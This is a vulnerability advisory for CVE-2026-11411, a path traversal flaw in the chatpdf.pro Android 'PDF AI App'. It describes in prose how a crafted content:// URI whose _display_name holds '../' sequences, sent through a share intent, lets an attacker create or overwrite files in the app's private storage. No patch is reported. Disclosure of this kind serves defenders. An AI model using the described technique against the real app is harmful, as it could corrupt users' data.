CVE-2026-11411

Vulnerability

A path traversal vulnerability exists in the chatpdf.pro component of iAI Lab PDF AI App, specifically within the getExternalCacheDir function. The vulnerability arises from the manipulation of the _display_name argument, which is used verbatim as a destination filename without sanitization. This affects version 4.21.0 and potentially others, as indicated by testing on version 4.22.0 [1].

Exploitation

An attacker can exploit this vulnerability by crafting a malicious content:// URI and sending it to the PDF AI App via a file-share intent (e.g., ACTION_SEND or ACTION_VIEW). The attacker controls the _display_name metadata associated with the URI. By including directory traversal sequences (e.g., ../) in the _display_name, the app will create arbitrary files within its own private storage directories, both internal and external [1]. This requires a local approach, meaning the attacker needs to be able to send an intent to the victim app [1].

Impact

Successful exploitation allows an attacker to create arbitrary files within the victim application's private storage, including the internal storage (/data/data/chatpdf.pro/) and external app-private storage (/sdcard/Android/data/chatpdf.pro/). This includes the ability to create intermediate directories at any depth. Since all filesystem operations execute within the victim app's security context, this could lead to the overwriting of sensitive application files, configuration data, or potentially facilitate further attacks, depending on what files are created or overwritten [1].

Mitigation

The vendor was contacted early regarding this disclosure but has not responded. No patched version or specific mitigation has been disclosed in the available references. Users are advised to exercise caution when handling files shared with the PDF AI App. The application is available on the Play Store [1].